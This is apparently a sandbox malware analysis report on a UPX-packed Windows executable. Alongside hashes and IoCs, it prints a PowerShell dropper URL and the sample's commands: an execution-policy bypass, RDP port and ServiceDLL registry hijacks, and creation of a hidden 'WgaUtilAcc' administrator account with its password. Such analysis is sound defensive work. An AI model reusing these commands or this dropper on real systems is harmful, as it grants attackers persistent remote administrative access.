ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d

Target

472208d7ba18d4c14b7e90b9db5d6feb.exe
Size

5.9MB
MD5

472208d7ba18d4c14b7e90b9db5d6feb
SHA1

ff24cc43998ff99e61b1a838e1d51c4888498935
SHA256

ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
SHA512

9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

flow	pid	Process
17	3920	powershell.exe
19	3920	powershell.exe
20	3920	powershell.exe
21	3920	powershell.exe
23	3920	powershell.exe
25	3920	powershell.exe
27	3920	powershell.exe
29	3920	powershell.exe
31	3920	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000500000001ab25-351.dat	upx
behavioral2/files/0x000600000001ab26-352.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
2052	Process not Found
2052	Process not Found

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_mrbjh4nt.5sl.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC7BC.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC7FC.tmp	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_o5pexc1t.zjm.ps1	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC80D.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC73D.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC79C.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1592	reg.exe

Runs net.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	19	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	21	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3144	powershell.exe
3144	powershell.exe
3144	powershell.exe
2484	powershell.exe
2484	powershell.exe
2484	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
3144	powershell.exe
3144	powershell.exe
3144	powershell.exe
3920	powershell.exe
3920	powershell.exe
3920	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
608	Process not Found
608	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	568	472208d7ba18d4c14b7e90b9db5d6feb.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeIncreaseQuotaPrivilege	2484	powershell.exe
Token: SeSecurityPrivilege	2484	powershell.exe
Token: SeTakeOwnershipPrivilege	2484	powershell.exe
Token: SeLoadDriverPrivilege	2484	powershell.exe
Token: SeSystemProfilePrivilege	2484	powershell.exe
Token: SeSystemtimePrivilege	2484	powershell.exe
Token: SeProfSingleProcessPrivilege	2484	powershell.exe
Token: SeIncBasePriorityPrivilege	2484	powershell.exe
Token: SeCreatePagefilePrivilege	2484	powershell.exe
Token: SeBackupPrivilege	2484	powershell.exe
Token: SeRestorePrivilege	2484	powershell.exe
Token: SeShutdownPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeSystemEnvironmentPrivilege	2484	powershell.exe
Token: SeRemoteShutdownPrivilege	2484	powershell.exe
Token: SeUndockPrivilege	2484	powershell.exe
Token: SeManageVolumePrivilege	2484	powershell.exe
Token: 33	2484	powershell.exe
Token: 34	2484	powershell.exe
Token: 35	2484	powershell.exe
Token: 36	2484	powershell.exe
Token: SeDebugPrivilege	732	powershell.exe
Token: SeIncreaseQuotaPrivilege	732	powershell.exe
Token: SeSecurityPrivilege	732	powershell.exe
Token: SeTakeOwnershipPrivilege	732	powershell.exe
Token: SeLoadDriverPrivilege	732	powershell.exe
Token: SeSystemProfilePrivilege	732	powershell.exe
Token: SeSystemtimePrivilege	732	powershell.exe
Token: SeProfSingleProcessPrivilege	732	powershell.exe
Token: SeIncBasePriorityPrivilege	732	powershell.exe
Token: SeCreatePagefilePrivilege	732	powershell.exe
Token: SeBackupPrivilege	732	powershell.exe
Token: SeRestorePrivilege	732	powershell.exe
Token: SeShutdownPrivilege	732	powershell.exe
Token: SeDebugPrivilege	732	powershell.exe
Token: SeSystemEnvironmentPrivilege	732	powershell.exe
Token: SeRemoteShutdownPrivilege	732	powershell.exe
Token: SeUndockPrivilege	732	powershell.exe
Token: SeManageVolumePrivilege	732	powershell.exe
Token: 33	732	powershell.exe
Token: 34	732	powershell.exe
Token: 35	732	powershell.exe
Token: 36	732	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeIncreaseQuotaPrivilege	2784	powershell.exe
Token: SeSecurityPrivilege	2784	powershell.exe
Token: SeTakeOwnershipPrivilege	2784	powershell.exe
Token: SeLoadDriverPrivilege	2784	powershell.exe
Token: SeSystemProfilePrivilege	2784	powershell.exe
Token: SeSystemtimePrivilege	2784	powershell.exe
Token: SeProfSingleProcessPrivilege	2784	powershell.exe
Token: SeIncBasePriorityPrivilege	2784	powershell.exe
Token: SeCreatePagefilePrivilege	2784	powershell.exe
Token: SeBackupPrivilege	2784	powershell.exe
Token: SeRestorePrivilege	2784	powershell.exe
Token: SeShutdownPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeSystemEnvironmentPrivilege	2784	powershell.exe
Token: SeRemoteShutdownPrivilege	2784	powershell.exe
Token: SeUndockPrivilege	2784	powershell.exe
Token: SeManageVolumePrivilege	2784	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 568 wrote to memory of 3144	568	472208d7ba18d4c14b7e90b9db5d6feb.exe	75
PID 568 wrote to memory of 3144	568	472208d7ba18d4c14b7e90b9db5d6feb.exe	75
PID 3144 wrote to memory of 496	3144	powershell.exe	77
PID 3144 wrote to memory of 496	3144	powershell.exe	77
PID 496 wrote to memory of 760	496	csc.exe	78
PID 496 wrote to memory of 760	496	csc.exe	78
PID 3144 wrote to memory of 2484	3144	powershell.exe	81
PID 3144 wrote to memory of 2484	3144	powershell.exe	81
PID 3144 wrote to memory of 732	3144	powershell.exe	84
PID 3144 wrote to memory of 732	3144	powershell.exe	84
PID 3144 wrote to memory of 2784	3144	powershell.exe	87
PID 3144 wrote to memory of 2784	3144	powershell.exe	87
PID 3144 wrote to memory of 3560	3144	powershell.exe	89
PID 3144 wrote to memory of 3560	3144	powershell.exe	89
PID 3144 wrote to memory of 1592	3144	powershell.exe	90
PID 3144 wrote to memory of 1592	3144	powershell.exe	90
PID 3144 wrote to memory of 2776	3144	powershell.exe	91
PID 3144 wrote to memory of 2776	3144	powershell.exe	91
PID 3144 wrote to memory of 2172	3144	powershell.exe	92
PID 3144 wrote to memory of 2172	3144	powershell.exe	92
PID 2172 wrote to memory of 2972	2172	net.exe	93
PID 2172 wrote to memory of 2972	2172	net.exe	93
PID 3144 wrote to memory of 732	3144	powershell.exe	94
PID 3144 wrote to memory of 732	3144	powershell.exe	94
PID 732 wrote to memory of 1192	732	cmd.exe	95
PID 732 wrote to memory of 1192	732	cmd.exe	95
PID 1192 wrote to memory of 3852	1192	cmd.exe	96
PID 1192 wrote to memory of 3852	1192	cmd.exe	96
PID 3852 wrote to memory of 3984	3852	net.exe	97
PID 3852 wrote to memory of 3984	3852	net.exe	97
PID 3144 wrote to memory of 2792	3144	powershell.exe	98
PID 3144 wrote to memory of 2792	3144	powershell.exe	98
PID 2792 wrote to memory of 2912	2792	cmd.exe	99
PID 2792 wrote to memory of 2912	2792	cmd.exe	99
PID 2912 wrote to memory of 3864	2912	cmd.exe	100
PID 2912 wrote to memory of 3864	2912	cmd.exe	100
PID 3864 wrote to memory of 3264	3864	net.exe	101
PID 3864 wrote to memory of 3264	3864	net.exe	101
PID 2268 wrote to memory of 2900	2268	cmd.exe	105
PID 2268 wrote to memory of 2900	2268	cmd.exe	105
PID 2900 wrote to memory of 3168	2900	net.exe	106
PID 2900 wrote to memory of 3168	2900	net.exe	106
PID 3832 wrote to memory of 2476	3832	cmd.exe	109
PID 3832 wrote to memory of 2476	3832	cmd.exe	109
PID 2476 wrote to memory of 3560	2476	net.exe	110
PID 2476 wrote to memory of 3560	2476	net.exe	110
PID 1860 wrote to memory of 4044	1860	cmd.exe	113
PID 1860 wrote to memory of 4044	1860	cmd.exe	113
PID 4044 wrote to memory of 756	4044	net.exe	114
PID 4044 wrote to memory of 756	4044	net.exe	114
PID 1644 wrote to memory of 1420	1644	cmd.exe	117
PID 1644 wrote to memory of 1420	1644	cmd.exe	117
PID 1420 wrote to memory of 1504	1420	net.exe	118
PID 1420 wrote to memory of 1504	1420	net.exe	118
PID 3836 wrote to memory of 3156	3836	cmd.exe	121
PID 3836 wrote to memory of 3156	3836	cmd.exe	121
PID 3156 wrote to memory of 3752	3156	net.exe	122
PID 3156 wrote to memory of 3752	3156	net.exe	122
PID 2248 wrote to memory of 188	2248	cmd.exe	125
PID 2248 wrote to memory of 188	2248	cmd.exe	125
PID 188 wrote to memory of 3972	188	net.exe	126
PID 188 wrote to memory of 3972	188	net.exe	126
PID 2484 wrote to memory of 2244	2484	cmd.exe	129
PID 2484 wrote to memory of 2244	2484	cmd.exe	129

C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe
"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3144
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\khb00ypm\khb00ypm.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:496
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6363.tmp" "c:\Users\Admin\AppData\Local\Temp\khb00ypm\CSC662AA544276048D0A04263C9CC1ECCAF.TMP"
      4⤵
      PID:760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:732
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2784
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3560
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:1592
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2776
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2172
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2972
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:732
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1192
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3852
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3984
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2792
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2912
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3864
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:3264
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2268
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:188

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2268
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:3168

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 1fp0fXTo /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3832
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 1fp0fXTo /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 1fp0fXTo /add
    3⤵
    PID:3560

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1860
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4044
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:756

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1644
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    3⤵
    PID:1504

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3836
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:3752

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 1fp0fXTo
1⤵
- Suspicious use of WriteProcessMemory
PID:2248
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 1fp0fXTo
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:188
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 1fp0fXTo
    3⤵
    PID:3972

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:2484
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  PID:2244

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:1508
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  PID:2816

C:\Windows\System32\cmd.exe
